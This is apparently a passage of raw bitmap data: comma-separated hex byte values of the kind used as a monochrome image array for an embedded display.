0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X80,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFC,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X7F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,
0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X01,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,
0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,0X00,0X00,0X7F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X00,0X07,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X00,0X7F,0X80,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X03,0XFF,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X01,0XFF,0XF0,0X00,0X00,0XFF,0XFF,0XFF,0XF0,0X00,0X03,0XFE,0X00,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X07,0XFF,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X3F,0XFF,0XFF,0X00,0X00,0X7F,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XC0,0X00,0X1F,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X3F,0XFF,0XFC,0X00,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X1F,0XFF,0XFE,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF3,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XE0,0X00,0X1F,
